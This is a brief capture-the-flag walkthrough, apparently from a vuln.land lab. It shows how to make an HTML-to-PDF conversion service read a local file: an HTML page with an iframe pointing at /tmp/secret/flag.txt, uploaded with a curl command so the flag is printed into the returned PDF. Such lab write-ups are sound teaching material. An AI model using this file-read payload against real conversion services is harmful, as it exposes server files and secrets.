

1. Create the following "index.html" document (which reads the flag file from an iframe):

```
1. <!DOCTYPE html>
2. <html>
3.   <head>
4.     <meta charset="utf-8" />
5.     <title>Test Page</title>
6.     <meta name="viewport" content="width=device-width, initial-
   scale=1" />
7.     <script>
8.       function readfile() {
9.         alert(
10.           document.getElementById("iframe").contentDocument.body.firstC
   hild
11.           .innerHTML
12.         );
13.       }
14.     </script>
15.   </head>
16.   <body>
17.     <iframe id="iframe" src="/tmp/secret/flag.txt" onload="readfile()">
18.   </iframe>
19.     <h1>Hello World!</h1>
20.   </body>
21.</html>
```

2. Execute the following command (in the same directory with the „index.html“ file)

```
~$ curl --request POST --url 'https://cde2c882-7bae-4817-b866-f4dccd99c0bb.idocker.vuln.land/convert/htm
l' --header 'Content-Type: multipart/form-data' --form files=@index.html -o flag.pdf
```

Raw Text:

```
curl --request POST --url 'https://cde2c882-7bae-4817-b866-
f4dccd99c0bb.idocker.vuln.land/convert/html' --header 'Content-Type: multipart/form-data' --
form files=@index.html -o flag.pdf
```

3. Read flag from pdf

